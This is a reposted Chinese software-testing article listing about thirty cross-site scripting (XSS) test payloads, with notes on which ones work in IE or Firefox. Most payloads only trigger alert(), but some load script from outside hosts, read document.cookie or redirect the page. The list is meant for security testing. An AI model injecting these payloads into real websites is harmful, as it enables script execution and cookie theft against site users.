XSS测试用例与原理讲解
作者:网络转载 发布时间:[ 2014/6/19 11:28:14 ] 推荐标签:测试用例 测试技术
1、<a href="javascript:alert(32)">DIBRG</a>
2、<img href="javascript:alert(32)">
在IE下可以,在FF下不可以
3、<img src=" http://xss.jpg" onerror=alert('XSS')>
IE,FF下均可
4、<img STYLE="background-image: url(javascript:alert('XSS'))">
在IE下可以,在FF下不可以
5、<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">
<IMG SRC="jav ascript:alert('XSS');">
<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<iframe src=http://example.com/scriptlet.html <
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert(document.cookie)>
<BODY onload!#$%&()*~+-_.,:;?@[/|"]^`=alert("XSS")>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<BR SIZE="&{alert('XSS')}">
<IMG SRC='vbscript:msgbox("XSS")'>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="width: expression(alert('XSS'));">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<A HREF="javascript:document.location='http://www.example.com/'">XSS</A>
<IMG SRC=javascript:alert('XSS')>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";
b="URL(""";
c="javascript:";
d="alert('XSS');"")";
eval(a+b+c+d);
|
本文内容不用于商业目的,如涉及知识产权问题,请权利人联系SPASVO小编(021-61079698-8054),我们将立即处理,马上删除。
相关推荐
如何写好测试用例文档测试用例设计编写规范如何保证测试用例设计质量和数量?软件测试用例详解如何提高测试用例执行的效率?黑盒测试中场景法具体怎么应用?怎么进行测试用例设计?黑盒测试中场景法设计测试用例应该怎么用?详解黑盒测试中的边界值分析法及边界值分析法测试用例测试用例有多重要?为什么要提升测试用例的质量?自动化测试工具AR进阶功能之脚本参数化实现用例的批量执行Selenium自动化测试框架ATF是如何根据数据生成用例的?测试管理工具TC之自动生成用例流程AutoRunner脚本参数化实现用例的自动化批量执行ALM(生命周期管理软件)测试用例管理之通过excel导入用例ALM(生命周期管理软件)测试用例管理之手动创建用例拿到一个测试需求时,如何入手写测试用例

sales@spasvo.com